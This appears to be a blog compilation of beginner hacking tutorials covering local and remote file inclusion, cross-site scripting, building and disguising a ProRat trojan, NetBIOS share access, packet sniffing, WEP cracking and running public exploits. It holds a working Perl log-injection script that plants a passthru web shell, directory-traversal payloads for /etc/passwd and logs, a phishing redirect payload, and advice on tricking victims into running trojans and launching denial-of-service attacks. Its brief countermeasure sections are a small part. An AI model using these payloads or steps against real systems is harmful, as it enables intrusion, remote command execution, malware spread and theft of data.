HELLO!

due to some reason of personal issue i have been out of blogging in need can always contact me by my mail
sherhin@gmail.com
-regards ,
-hacking tutorials are based on my basic language.[all the rights reserved]
-non of the content from below, posting or using any where is prohibited.
-i am not responsible for the wrong code you input and its effect.
-from no other internet source you would be available , as this is my 2 years work, visit Daily!
-Lessons are for Only Educational Purpose Only!
--------------------------------------------------------------------------------------
sherhin@gmail.com www.sherhin.tk
--------------------------------------------------------------------------------------

Web Hacking (Local File Inclusion)

Local File Inclusion (LFI) is when you have the ability to browse through the server by means of directory transversal. One of the most common uses of LFI is to discover the /etc/passwd file. This file contains the user information of a Linux system. Hackers find sites vulnerable to LFI the same way I discussed for RFI’s. Let’s say a hacker found a vulnerable site, www.target-site.com/index.php?p=about, by means of directory transversal he would try to browse to the /etc/passwd file:

www.target-site.com/index.php?p= ../../../../../../../etc/passwd

The ../ you up one directory and the amount to use depends where in the server you are located compared the location of the /etc/passwd file.
If the hacker is able to successfully get to the /etc/passwd file he would see a list similar to the one below.

Root:x:0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/log:/bin/false
lp:x:4:7:lp:/var/spool/lpd:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync

shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt

Each line is divided into seven parts:username:passwd:UserID:GroupID:full_name:directory:shell
If the password hash was shown, the hacker would be able to crack it and get access to the machine, but in our case the password isn’t shown. This means that the password is shadowed and in the /etc/shadow file which the hacker doesn’t have access to. If this was the case, the hacker would probably attempt to get access to the system another way, through log injection.
The log directories are located in different areas in different Linux distributions. Below is a list of the most common locations.

../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_log
../../../../../../../usr/local/apache/logs/access.log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_log
../../../../../../../usr/local/apache/logs/error.log
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log

../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log

Below are the steps a hacker would take to take gain access to the system through log injection.

1. First the hacker would find what operating system version the target server is running and then search where the log files are located on that OS.

2. Next, through LFI the hacker would navigate to that file location. If he is displayed with a bunch of logs, then he may continue.

3. The hacker would then inject some PHP code into the logs by typing
<? Passthru($_GET[‘cmd’]) ?> after = in the URL. This will cause the PHP script to be logged because there is no file by that name. What this script will do is give the hacker shell access and allow him to execute system commands.

4. Now if the hacker goes back to the log file, he will see that his PHP script wasn’t parsed and instead converted to
%3C?%20passthru($_GET[cmd])%20?%3E

5. When you submitted the script, the browser automatically encoded the URL. Luckily there is a pearl script that can get around this problem. Below is the pearl script, edit the variables: $site, $path, $code, and $log to the appropriate information.

#!/usr/bin/perl -w
use IO::Socket;
use LWP::UserAgent;
$site=”www.vulnerablesite.com”;
$path=”/”;
$code=”<? Passthru(\$_GET[cmd]) ?>”;
$log = “../../../../../../../etc/httpd/logs/error_log”;
print “Trying to inject the code”;
$socket = IO::Socket::INET->new(Proto=>”tcp”, PeerAddr=>”$site”, PeerPort=>”80”) or die “\nConnection Failed.\n\n”;
print $socket “GET “.$path.$code.” HTTP/1.1\r\n”;
print $socket “User-Agent: “.$code.”\r\n”;
print $socket “Host: “.$site.”\r\n”;
print $socket “Connection: close\r\n\r\n”;
close($socket);
print “\nCode $code successfully injected in $log \n”;
print “\nType command to run or exit to end: “;
$cmd = <STDIN>;
while($cmd !~ “exit”) {
$socket = IO::Socket::INET->new(Proto=>”tcp”, PeerAddr=>”$site”, PeerPort=>”80”) or die “\nConnection Failed.\n\n”;
print $socket “GET “.$path.”index.php?filename=”.$log.”&cmd=$cmd HTTP/1.1\r\n”;
print $socket “Host: “.$site.”\r\n”;
print $socket “Accept: */*\r\n”;
print $socket “Connection: close\r\n\n”;
while ($show = <$socket>)
{
print $show;
}
print “Type command to run or exit to end: “;
$cmd = <STDIN>;

6. Once the hacker runs this script and it goes successfully, he will be able to run any command on the server. From here he can run any local exploits to gain root, or just browse the server files.

Web Hacking (Remote File Inclusion)

Remote File Inclusion
Remote File Inclusion (RFI) occurs when a remote file, usually a shell (a graphical interface for browsing remote files and running your own code on a server), is included into a website which allows the hacker to execute server side commands as the current logged on user, and have access to files on the server. With this power the hacker can continue on to use local exploits to escalate his privileges and take over the whole system.

Many servers are vulnerable to this kind of attack because of PHP’s default settings of register_globals and allow_url_fopen being enabled. Although as of PHP 6.0, register_globals has been depreciated and removed, many websites still rely on older versions of PHP to run their web applications. Now let’s go through the steps a hacker would take to exploit this type of vulnerability in a website.

1. First the hacker would find a website that gets its pages via the PHP include() function and is vulnerable to RFI. Many hackers use Google dorks to locate servers vulnerable to RFI. A Google dork is the act of using Google’s provided search tools to help get a specific search result.

2. Website that include pages have a navigation system similar to:

http://target-site.com/index.php?page=PageName

3. To see if a the page is vulnerable, the hacker would try to include a site instead of PageName like the following:

http://target-site.com/index.php?page=http://google.com

4. If the Google homepage shows up on the website, then the hacker knows the website is vulnerable and would continue to include a shell.

5. A couple of the most popular shells are c99 and r57. A hacker would either upload them to a remote server or just use a Google dork to locate them already online and insert them. To find the a shell the hacker would search Google for: inurl:c99.txt. This will display many websites with the shell already up and ready to be included. At the end of the URL make sure to add a ? so that if anything comes after c99.txt, it will be passed to the shell and not cause any problems. The new URL with the shell included would look like:

http://target-site.com/index.php?page=http://site.com/c99.txt?

6. Sometimes the PHP script on the server appends “.php” to the end of every included file. So if you included the shell, it would end up looking like “c99.txt.php” and not work. To get around this, you would add a null byte () to the end of c99.txt. This tells the server to ignore everything after c99.txt.

7. In step one, I told you that hackers use Google dorks to look for sites possibly vulnerable to RFIs. An example of a Google dork would be: allinurl:.php?page=. This looks for URL’s with .php?page= in them. This is only an example and you most likely won’t find any vulnerable sites with that search. You can try switching around the word “page” with other letters and similar words. Hackers usually search vulnerability databases like www.milw0rm.com for already discovered RFI vulnerabilities in site content management systems and search for websites that are running that vulnerable web application with a Google dork.

8. If the hacker succeeds in getting the server to parse the shell, he will be presented with a screen similar to the following:

The shell will display information about the remote server and list all the files and directories on it. From here the hacker would find a directory that has read and write privileges and upload the shell but
this time as a .php file so that incase the vulnerability is fixed, he will be able to access it later on.

9. The hacker would next find a way to gain root privileges on the system. He can do this by uploading and running local exploits against the server. He could also search the victim server for configuration files. These files may contain username and passwords for the MYSQL databases and such.
To protect yourself from RFI attacks, simply make sure you are using up-to-date scripts, and make sure you server php.ini file has register_globals and allow_url_fopen disabled.

Web Hacking (Cross Site Scripting)

Web Hacking
With the Web 2.0 era upon us, most websites are dynamic and allow the users to interact with the content. Many of the web applications that run these dynamic websites have security flaws. In this chapter, we will discuss some of the most popular forms of attacks against web applications.
Cross site scripting
Cross site scripting (XSS) occurs when a user inputs malicious data into a website, which causes the application to do something it wasn’t intended to do. XSS attacks are very popular and some of the biggest websites have been affected by them including the FBI, CNN, Ebay, Apple, Microsft, and AOL. Some website features commonly vulnerable to XSS attacks are:
• Search Engines
• Login Forms
• Comment Fields
There are three types of XSS attacks:
1. Local – Local XSS attacks are by far the rarest and the hardest to pull off. This attack requires an exploit for a browser vulnerability. With this type of attack, the hacker can install worms, spambots, and backdoors onto your computer.

2. Non-Persistent – Non-persistent attacks are the most common types of attack and don’t harm the actual website. Non-persistent attacks occur when (- a scripting language that is used for client-side web development.) or HTML is inserted into a variable which causes the output that the user sees to be changed. Non-persistent attacks are only activated when the user visits the URL crafted by the attacker.

3. Persistent – Persistent attacks are usually used against web applications like guest books, forums, and shout boxes. Some of the things a hacker can do with a persistent attacks are:
• Steal website cookies (Cookies are used by web browsers to store your user information so that you can stay logged into a website even after you leave. By stealing your cookie, the attacker can sometimes login without knowing your password.)
• Deface the website
• Spread Worms

Now that you know what cross site scripting is, how can you tell if a website if vulnerable to it?
1. If there is a search field, enter a word and if that word is displayed back to you on the next page, there’s a chance it is vulnerable.
2. Now we will insert some HTML. Search for <h1>hi</h1>, and if the word “hi” is outputted as a big header, it is vulnerable.

3. Now we will insert JavaScript. Search for <script>alert(“hi”);</script> , if the word “hi” pops up in a popup box, then the site is vulnerable to XSS.

4. As you can see, these examples are non-persistent. Now if a hacker found a guestbook or something else like it that was vulnerable, he would be able to make it persistent and everyone that visits the page would get the above alert if that was part of his comment.
Hackers knowledgeable in JavaScript and PHP will be able to craft advanced XSS attacks to steal your cookies and spread XSS worms, but to show you a simple example of something more realistic then the above examples, I will show you how a hacker could use XSS to help with phishing.

1. Let’s say a hacker wants to phish passwords from www.victim-site.com. If he was able to find an XSS vulnerability anywhere on the website, he would be able to craft a link pointing to the legit website that redirects to his phishing website.

2. In the example with the popup, when I inserted the JavaScript into the search box, a URL was formed that looked like the following:

Here you can see that the code you typed into the search box was passed to the “searchbox” variable.
3. In the URL the hacker would then replace everything in between ?searchbox= and &search with the following JavaScript code:
<script>window.location = “http://phishing-site.com”</script>

4. Now when you go to the finished link, the legitimate site will redirect to the phishing website. Next what the hacker would do is encode the URL to make it look more legit and less suspicious. You can encode the URL at http://www.encodeurl.com/.

5. My finished encoded URL is: http%3A%2F%2Flocalhost%2Fform.php%3Fsearchbox%3D%3Cscript%3Ewindow.location+%3D+%5C%22http%3A%2F%2Fphishing-site.com%5C%22%3C%2Fscript%3E%26search%3Dsearch%21

6. Once the victim sees that the link points to the legitimate website, he will be more likely to fall for the phishing attack.

Windows Hacking (Malware)

Malware is a big problem today. Everyday thousands of innocent people are getting infected by different types of malware. The most common types of malware today are viruses, worms and Trojans. In this chapter we will discuss all the types of malware, and give you an example of a windows trojan in use. The reason we will use Windows is because malware is very rare in Linux and Mac computers.
Definitions
1. Viruses – Viruses cannot spread without the help of us humans. They are like parasites because they need a host to attach themselves to. The host is usually a legitimate looking program or file. Once this program is launched, the virus is executed and infects other files on your computer. Viruses can be very destructive. They can do damage to your computer hardware, software and files. Viruses are spread through the sharing of files and are many times sent within emails via attachments.
2. Worms – A worm is a malicious program that can replicate itself onto other computers on a network. Unlike a virus, worms don’t need a human to be able to spread and infect systems. Once it infects a system, it uses that system to send out other copies of itself to other random systems attempting to infect them.
3. Trojan Horse – A trojan horse is a malicious program that can be used to do silly things to a system like changing its desktop, mess with the user interface, and take control of your mouse. It can also be used for some serious things like accessing your data, erasing your files, stealing your passwords, and capturing your keystrokes.
4. Logic Bombs – Logic bombs are usually pieces of code that are programmed into a program that lie dormant until a certain time or until a user does a certain action which causes it to be executed. When it is triggered it performs a certain function that the program wasn’t intended to do.
5. Bacteria – Bacteria make many copies of themselves and eventually end up taking up all of the computers recourses such as all of its processor power, memory and disk space. This results in the legitimate user losing access to those resources.
ProRat
To show you an example of a malicious program, I will use a well known Windows Trojan, ProRat.
1. Download ProRat. Once it is downloaded right click on the folder and choose to extract it. A password prompt will come up. The password will be “pro”.
2. Open up the program. You should see the following:

3. Next we will create the actual Trojan file. Click on Create and choose Create ProRat Server.

4. Next put in your IP address so the server could connect to you. If you don’t know your IP address click on the little arrow to have it filled in for you automatically. Next put in your e-mail so that when and if a victim gets infected it will send you a message. We will not be using the rest of the options.

5. Click on the General Settings button to continue. Here we will choose the server port the program will connect through, the password you will be asked to enter when the victim is infected and you wish to connect with them, and the victim name. As you can see ProRat has the ability to disable the windows firewall and hide itself from being displayed in the task manager.

6. Click on the Bind with File button to continue. Here you will have the option to bind the trojan server file with another file. Remember a trojan can only be executed if a human runs it. So by binding it with a legitimate file like a text document or a game, the chances of someone clicking it go up. Check the bind option and select a file to bind it to. In the example I will use an ordinary text document.

7. Click on the Server Extensions button to continue. Here you choose what kind of server file to generate. I will stick with the default because it has icon support, but exe’s looks suspicious so it would be smart to change it.

8. Click on Server Icon to continue. Here you will choose an icon for your server file to have. The icons help mask what the file actually is. For my example I will choose the regular text document icon since my file is a text document.

9. Finally click on Create Server to, you guessed it, create the server file. Below is what my server file looks like.

10. A hacker would probably rename it to something like “Funny Joke” and send it as an attachment to some people. A hacker could also put it up as a torrent pretending it is something else, like the latest game that just came out so he could get people to download it.

11. Now, I will show you what happens when a victim installs the server onto his computer and what the hacker could do next.

12. I’m going to run the server on my own computer to show you what would happen. Once I run it the trojan will be installed onto my computer in the background. The hacker would then get a message telling him that I was infected. He would then connect to my computer by typing in my IP address, port and clicking Connect. He will be asked for the password that he made when he created the server. Once he types it in, he will be connected to my computer and have full control over it.

13. Now the hacker has a lot of options to choose from as you can see on the right. He has access to all my computer files, he can shut down my pc, get all the saved passwords off my computer, send a message to my computer, format my whole hard drive, take a screen shot of my computer, and so much more. Below I’ll show you a few examples.

14. The image below shows the message I would get on my screen if the hacker chose to message me.

15. Below is an image of my task bar after the hacker clicks on Hide Start Button.

16. Below is an image of what the hacker would see if he chose to take a screen shot of the victims screen.

As you saw in the above example, a hacker can do a lot of silly things or a lot of damage to the victim. ProRat is a very well known trojan so if the victim has an anti-virus program installed he most likely won’t get infected. Many skilled hackers can program their own viruses and Trojans that can easily bypass anti-virus programs.
Countermeasures
There are a couple things you can do to prevent yourself from being infected by the malware discussed in this chapter.
1. Make sure you have good and up-to-date anti-virus software installed on your computer. Also if there is an automatic update option on your anti-virus software, make sure it is enabled.
2. Make sure you have a firewall installed on your computer and make sure that it is actually enabled. Firewalls protect against unauthorized inbound and outbound connections.

Windows Hacking (NetBIOS)

NetBIOS
NetBIOS stands for Network Basic Input Output System. It allows your LAN or WAN to share drives, folders, files and printers. Gaining access to a computer through NetBIOS is very simple and easy. The only thing required is for the target machine to have file and printer sharing enabled and to have port 139 open. Below I will show you an example of what a hacker would do to gain access to a Windows machine through NetBIOS.
1. First the hacker would search for a target. A common tool used by hackers is Angry IP Scanner . Download and install it.
2. Next the hacker would insert the IP range he would like to scan. If the hacker was connected to a WLAN (Wireless Local Area Network) he would scan the local computers like I have shown below.

3. Since the hacker’s goal is to gain access to a system through NetBIOS, which runs on port 139, he will choose to scan each found host for that port. Click the downward arrow on the right and check the Scan ports box. A popup will come up asking you if you would like to select a new port. Click YES.

4. Type in the port number 139 into the first box and click OK.

5. Click start. The program will begin scanning and when it’s complete a box with the results will come up.

6. As you can see 224 Ips were scanned. Out of those only one was alive and luckily it has port 139 open.

7. Open the Command Prompt by going to Start -> Run -> Type in cmd -> <ENTER> .

8. Now the hacker would run the “nbtstat –a TargetIPaddress” this will tell us if the target has file and printing enabled. Without it, this attack is not possible.

9. In the above image DAVIDS-MACHINE is the name of the target computer. If you look to the right of it you will see the number <20>. This means that file and printer sharing is enabled. If there was no <20> then you could not go any further and would have to find a new target.
10. Next the hacker would run the command “net view \\TargetIPaddress”. This command will display any shared drives, folders, files or printers. If nothing comes up, you won’t be able to gain access to anything since there is nothing being shared. In my case, I got the following:

11. In my example, I have two printers shared and one disk named SharedDocs. The hacker would be able to take control of my printers and view everything in my SharedDocs disk.
12. To gain access to my SharedDocs disk, the hacker would have to map out the drive onto his computer. If successful, the hacker will have all the contents of my drive on his computer.
13. To map out my drive onto his computer the hacker would use the command “net use G: \\TargetIPaddress\DriveName”. So in my case I would run the command “net use G:\\192.168.1.101\SharedDocs”. You can use any letter in place of G:\\. This just tells the computer what to name the drive on your computer.

14. What’s this? Looks like I already have a drive G. To avoid this problem, go to My Computer where it will show all of your current Drives. To fix this simply change the letter G to a nonexistent drive letter.

15. Once the command is completed successfully, go to My Computer and you should see a new drive under Network Drives. Double clicking it brings up all of the targets documents.

Wireless Hacking(Packet Sniffing)

Packet Sniffing
I will be using the program Wireshark do demonstrate packet sniffing. Packet sniffing is the act of capturing packets going through a network. With a packet sniffer, once a hacker gains access to wireless network he could intercept private information going through a network such as: usernames, passwords, IM conversations, and e-mails. Let’s show you an example.
1. Download and install Wireshark .
2. Launch it and click on the option to list the available capture interfaces as shown below.

3. Next choose the target to begin to capture their packets and click on start.
4. If you don’t know which one to choose, wait a little bit and the one that accumulates the most packets is your best choice. Many captured packets shows that the user is currently active.

5. Now to show you an example of how Wireshark can be used I will start up Windows Live and send a message. As you will see in the image below, my whole conversation will be captured. To filter out all the useless data and to only display the Windows Live related packets type in “msnms” in the filter bar.

6. As you can see, my message is displayed at the bottom. If I continue down the list I can see the whole conversation. Usernames and passwords are captured the same way, and if they aren’t encrypted, you can see them in plain text.
Some other useful sniffing programs to learn:

• WinDump
• Snort
• Dsniff
Google Search! Search Here!

Web
Images
Local Listing
Mobile Web

Countermeasures
There are a few countermeasures you could follow to keep your wireless network safe from hackers.
1. Change your routers default password and make sure you have WAP encryption enabled. If your router doesn’t have a WAP option, use WEP. It is better than nothing.

2. Use a long secure password for your router. Include numbers, lowercase letters, uppercase letters and other symbols. The more obscure the better.

3. Make sure your router has the option to not broadcast your SSID enabled. This will prevent some programs like Net Stumbler from locating your wireless network.

4. Use MAC filtering on your router. Every wireless card and wireless adapter has a MAC address. By choosing to allow only your MAC addresses onto the network, you can keep a lot of attackers out.

5. To prevent packet sniffing attacks from affecting you, make sure the important sites you use, like banks, use SSL (Secure Socket Layer) encryption. You can tell if the site has SSL enabled if the URL begins with https:// instead of http:/.

6. In cafés or other hotspots where internet is free, packet sniffing is very common. To avoid being affected use a VPN (Virtual Private Network) service to encrypt the data you send across the internet.

Wireless Hacking (Cracking WEP)

Cracking WEP
In this section we will use be using the Live Linux distribution called BackTrack to crack WEP. Backtrack comes with a huge list of preloaded software for this very purpose. Before we begin, there are a couple requirements:
1. You need a computer with a compatible wireless adapter.
2. Download Backtrack and create a Live CD.
The tools we will be using on Backtrack are:
• Kismet – a wireless network detector
• airodump – captures packets from a wireless router
• aireplay – forges ARP requests
• aircrack – decrypts the WEP keys
Let’s begin!
1. First we will find a wireless access point along with its bssid, essid and channel number. To do this we will run kismet by opening up the terminal and typing in kismet. It may ask you for the appropriate adapter which in my case is ath0. You can see your device’s name by typing in the command iwconfig.

2. To be able to do some of the later things, your wireless adapter must be put into monitor mode. Kismet automatically does this and as long as you keep it open, your wireless adapter will stay in monitor mode.

3. In kismet you will see the flags Y/N/0. Each one stands for a different type of encryption. In our case we will be looking for access points with the WEP encryption. Y=WEP N=OPEN 0=OTHER(usually WAP).

4. Once you find an access point, open a text document and paste in the networks broadcast name (essid), its mac address (bssid) and its channel number. To get the above information, use the arrow keys to select an access point and hit <ENTER> to get more information about it.

5. The next step is to start collecting data from the access point with airodump. Open up a new terminal and start airodump by typing in the command:

airodump-ng -c [channel#] -w [filename] --bssid [bssid] [device]

In the above command airodump-ng starts the program, the channel of your access point goes after -c , the file you wish to output the data goes after -w , and the MAC address of the access point goes after --bssid. The command ends with the device name. Make sure to leave out the brackets.

6. Leave the above running and open another terminal. Next we will generate some fake packets to the target access point so that the speed of the data output will increase. Put in the following command:

aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:55:66 -e [essid] [device]

In the above command we are using the airplay-ng program. The -1 tells the program the specific attack we wish to use which in this case is fake authentication with the access point. The 0 cites the delay between attacks, -a is the MAC address of the target access point, -h is your wireless adapters MAC address, -e is the name (essid) of the target access point, and the command ends with the your wireless adapters device name.

7. Now, we will force the target access point to send out a huge amount of packets that we will be able to take advantage of by using them to attempt to crack the WEP key. Once the following command is executed, check your airodump-ng terminal and you should see the ARP packet count to start to increase. The command is:

aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:5:66 [device]

In this command, the -3 tells the program the specific type of attack which in this case is packet injection, -b is the MAC address of the target access point, -h is your wireless adapters MAC address, and the wireless adapter device name goes at the end.

8. Once you have collected around 50k-500k packets, you may begin the attempt to break the WEP key. The command to begin the cracking process is:

aircrack-ng -a 1 -b [bssid] -n 128 [filename].ivs

In this command the -a 1 forces the program into the WEP attack mode, the -b is the targets MAC address, and the -n 128 tells the program the WEP key length. If you don’t know the -n , then leave it out. This should crack the WEP key within seconds. The more packets you capture, the bigger chance you have of cracking the WEP key.

With all the different computers and network adapters out there, you may come across a error occasionally. If you get stuck, remember, Google is your friend!  Search for an answer and I guarantee you that 99% of the time you will find a solution.

Wireless Hacking (Scanning For Wireless Networks)

Nowadays, there are wireless hotspots everywhere! You can get internet access with a wireless enabled laptop almost everywhere you go. In this chapter I will discuss ways a hacker goes about getting into secure wireless networks and things he can do once he is inside.
Scanning for Wireless Networks
For this section and the following, you will need to have a wireless card/adapter. The hacker starts by scanning for wireless networks near him. The Windows tool we will use in this section is called NetStumbler. Also by the time you receive this eBook MacStumbler may already be released for those of you using a Mac. Some other similar programs are:
• Kismet for Windows and Linux.
• KisMac for the Mac.
1. Download and install NetStumbler.
2. Run it. It automatically starts to scan for wireless access points.
3. Once it is completed, you should see a list of all the wireless access points around you.

4. If you click on the MAC address of one of the discovered wireless networks under channels, you will see a graph that shows the wireless network’s signal strength. The more green and the less spaces, the better the signal.

5. As you can see NetStumbler provides a lot more than just the name (SSID) of the wireless network. It provides the MAC address, Channel number, encryption type, and a bunch more. All of these come in use when a hacker decides he wants to get in the secured network by cracking the encryption. The most common types of encryption are:

• WEP (Wired Equivalent Privacy) – WEP isn’t considered safe anymore. Many flaws have been discovered that allow a hacker to crack a WEP key easily.
• WAP (Wireless Application Protocol) – WAP is the currently the most secure and best option to secure your wireless network. It’s not as easily cracked as WEP because the only way to retrieve a WAP key is to use a brute-force or dictionary attack. If your key is secure enough, a dictionary attack won’t work and it could take decades to crack it if you brute-force it. This is why most hackers don’t even bother.

Network Hacking(Cygwin)

Cygwin
If you only have access to a Windows machine, and you come across a C/C++ script that is only meant to be compiled in Linux, then you can use Cygwin to make it possible in Windows. Let’s get right into it!
Cygwin
1. Download Cygwin from http://www.cygwin.com/
2. Run the installer.
3. Choose to install from the internet.
4. Continue on until it asks you to choose a mirror to download from. Choose any.

5. Next you must select packages to download. Click View “+” under Devel to expand the category. Expand the window so that you can see all of the columns. Under the package column, search for gcc-core and click on “Skip” to select it and click next.
6. If it tells you that you haven’t selected a couple packages that you need, agree to install them and click next.
7. It will begin to install the packages
8. Once it is installed, double click the desktop icon and a command prompt should come up.

9. Using the same exploit as the last example, save and move it into the “C:\cygwin” directory as “exploit.c”.
10. Now it’s time to run the exploit. First you must change the directory to the home directory (C:\cygwin) by using the command “cd /”. Next use the “ls” command to display all the files in the current directory. You should see “exploit.c”.
11. Now to compile the script we use the same command as we did in Ubuntu: “gcc exploit.c –o exploit”. Here you see that we added a new parameter “-o”. This simply tells the compiler to name the output exe “exploit.exe”. Hit <ENTER> and if no error messages came up, then it was successful. If you use the “ls” command again, you should see a new file “exploit.exe” in the directory.
12. To run the exploit, simply type “./exploit”. It will now display the scripts runtime directions. Put in the right options and parameters and run the script again. The picture below shows all of these steps being done.

13.Once a hacker runs this script against a vulnerable machine and the script works, he will have root access to the target computer.

The more exploits you run, the more you will notice that half of them may not work. Many exploits are created and tested in specific environments and the expected outcome only happens when the exploit is run in the exact same environment. That is another reason why programming knowledge is needed, so you could edit the exploit script to work for you.
Once a skilled hacker gains root to a server he has the ability to do a lot of damage. Some of the things a hacker might do with a rooted server is:
• Add himself as a permanent user for future access.
• Add the server into his botnet collection so he could use it as a weapon against other servers.
• Use it as a proxy to hack other websites.
• Install a rootkit so he can come back and have full control over the server when needed.
• Constantly steel information as it comes.
• Use the system to store illegal data.
• Deface the website and sometimes the hacker will delete everything off of the server.

Countermeasures
There are a few things you can do to stay secure from network hacking attempts.
1. Keep all your software up to date. There will always be new vulnerabilities coming out, and your responsibility is to patch them immediately after a patch comes out.
2. Implement a firewall. This will keep most of the bad data out and good data in.
3. Install anti-virus software.
4. Scan your system with a vulnerability scanner. This may reveal possible vulnerabilities in your system.

Network Hacking (C/C++)

C/C++
C/C++ are the most popular programming languages used in developing exploit code. Some C/C++ code can be compiled with any compiler and on any operating system. There are also C/C++ scripts that are made to be compiled by a particular compiler, or in a particular operating system. You can usually find this information commented in the top of the script. Below is a list of the most popular compilers for each operating system.
C/C++

Windows
• Microsoft Visual C++
• Borland C++
• Dev-C++
Mac
• MrC/MrCpp
• Xcode
Linux
• GCC


Google Search! Search Here!

Web
Images
Local Listing
Mobile Web

Most C/C++ exploit code is made to be compiled in Linux. If you wish to run one them but you’re only option is Windows, then you can use Cygwin . Cygwin is a Linux-like environment that runs in Windows and acts as a Linux emulation layer, allowing you to run Linux scripts in windows. Although many Linux C/C++ exploit scripts will work with Cygwin, there are also many may not. I will show you how you can use Cygwin right after I give you an example of compiling and running a C/C++ script in Ubuntu Linux. If you aren’t already using Linux, I would recommend following along using VirtualBox from the Linux chapter.

1. Open up Terminal.

2. Go to http://milw0rm.com/exploits/269 and copy the remote root exploit.

3. Open up the VI editor in the terminal by typing in “vi” and hitting <Enter>. You should see the following screen:

4. To get into typing mode type in I (Shift + I).

5. You are now in insert mode. Right click and paste in the exploit.

6. The script should have pasted in. Now it’s time to save it. Hit the <ESC> key and then type in “:wq exploit.c” . This quits and saves the document as exploit.c .

7. Now type in the command: ls. This command lists all the files in the current directory. You should see your newly made file in the list.

8. Now we will compile the script using the GCC compiler, but before we compile this script we need to first install a development package of all the libraries and headers needed to compile C/C++ scripts. It’s a very easy process. In the terminal type in the following command:

sudo apt-get install build-essential

9. This command downloads the package and then asks you if you would like to continue with installing. Type in a “y” and hit enter. It automatically will install the package.

10. Now to compile the script type in the command “gcc exploit.c” , it will quickly compile. If there was no error displayed, then it was successful. By using the “ls” command you can now see there’s a new file named “a.out” this is the compiled script.

11. To run the new file type in the command “./a.out”. This will display a little note telling you how to run the exploit against a server. The below image shows all of these steps together.

12. The last line of the picture shows the proper way a hacker would use the script against a server.

13. Once the hacker ran the script against a vulnerable server running BeroFTPD 1.3.4 and the script worked, the hacker would now have root access to the server. Below is an image of what the root account on Ubuntu would look like.

As you can see the “whoami” command tells you who you are on the system. In this case I am root.

Network Hacking (Python)

Pythton
Python is also a common programming language used in creating exploits. You can download python from
Python
http://www.python.org/download/. The steps to running a Python exploit are just as easy as the ones for Perl. See if you can get the exploit: http://milw0rm.com/exploits/3523 up and running. Hint: Python files end with .py .

Network Hacking (Perl)

Running Perl exploit scripts is just as easy as running PHP scripts.
Perl
1. Download and install the appropriate version of ActivePerl.

2. Next the hacker would find an exploit for vulnerability. In this example we will use the following example: http://milw0rm.com/exploits/6581 for WinFTP Server 2.3.0. This is also a Denial of Service (DoS) exploit.

3. Edit the options like the target server and others as needed. Then save the file as “exploit.pl”. As you can see Pearl exploits begin with “!/usr/bin/perl”.

4. Open CMD or Terminal and change into the directory with the exploit using the CD (change directory command). Then run the exploit by typing:
“perl exploit.pl”. The attack has begun.

Network Hacking (Penetrating)

Penetrating
So now you might be wondering: Once the hacker finds the right exploit, how does he go about running it against the target and penetrating the server? This will all be explained in this chapter.
As you search Milw0rm or any of the other couple exploit database websites provided in this chapter, you will notice that the exploits are created in many different types of programming languages. Below I will list a few of the most common programming languages used, and how a hacker would compile and run them against a server.
PHP-
PHP exploits are very common. PHP exploit code usually starts with <?php and ends in ?> . Let’s say the hacker wanted to do some temporary damage to a server running FTP Server 0.9.20. If he was to search milw0rm he would come up with the following DOS exploit:
PHP
http://milw0rm.com/exploits/2901 and run it against the server. Below are the steps the hacker would take.
1. First the hacker would need to install PHP onto his computer. WAMP is a free web server that comes with PHP. If you are using a Mac then you must install MAMP . Next, paste the PHP exploit into notepad or any word processor and save it as “exploit.php”.

You will have to know a little PHP to edit the target address. On line 13 of this exploit you will see:
$address = gethostbyname(‘192.168.1.3’); here you will have to edit in the IP address of the target. Every exploit is different. Some you have to know what to edit and some have runtime instructions. Save this edited file into the PHP directory on your server that contains the PHP executable file. In WAMP the directory would be C:\wamp\bin\php\php5.2.5 , of course the last directory version number changes with newer versions.
2. Next open up the command prompt or terminal if you are using a Mac, and go to the PHP directory by using the CD (change directory) command followed by the directory location.

3. Now it’s time to run the exploit. To run it simple type in “php exploit.php” and hit enter. You should get a couple errors.

4. When skilled hackers create exploits, they sometimes insert mistakes or extra code so that script kiddies with no programming knowledge wouldn’t be able to use them. The above is a simple example. If you go to line 18 of this exploit , will see the line
$junk.=”../../../sun-tzu/../../../sun-tzu/../../../sun-tzu”;
This line was inserted to throw off the script kiddies and by simply removing it, the error will disappear. Just another reason why it’s helpful to learn how to program.
Also every now and then you will receive other errors such as the one the second picture shows above. These errors have to do with the server configurations. Now as a hacker, you have to learn a lot on your own. By going around asking simple questions like this all the time will make you look bad and the most common response you will receive: www.google.com . Google is your friend, so take advantage of it! So starting now, begin to use Google, and if you are still stuck, then you can ask help on community forums.

5. Once the errors are fixed and the program is running, a DoS attack will be launched the target website up until you exit the command screen. If the target server can’t handle much, you may be able to see the affect of your exploit by going to the site and clicking around. If it is working, the site will begin to lag and it’ll take a long time to load pages. Eventually the server may go down completely.

Network Hacking (Searching for Vulnerabilities)

Now that the hacker has the name of the software being used and its version number, he would take that information and search a couple vulnerability databases for an exploit. If there’s an exploit available, he will run it against the server and take complete control. If there isn’t any, he would move onto another open port and try again on a different service.
Some of the most popular exploit databases are:

• Milw0rm
• SecurityFocus
• osvdb
 •Exploit-DB

Google Search! Search Here!

Web
Images
Local Listing
Mobile Web

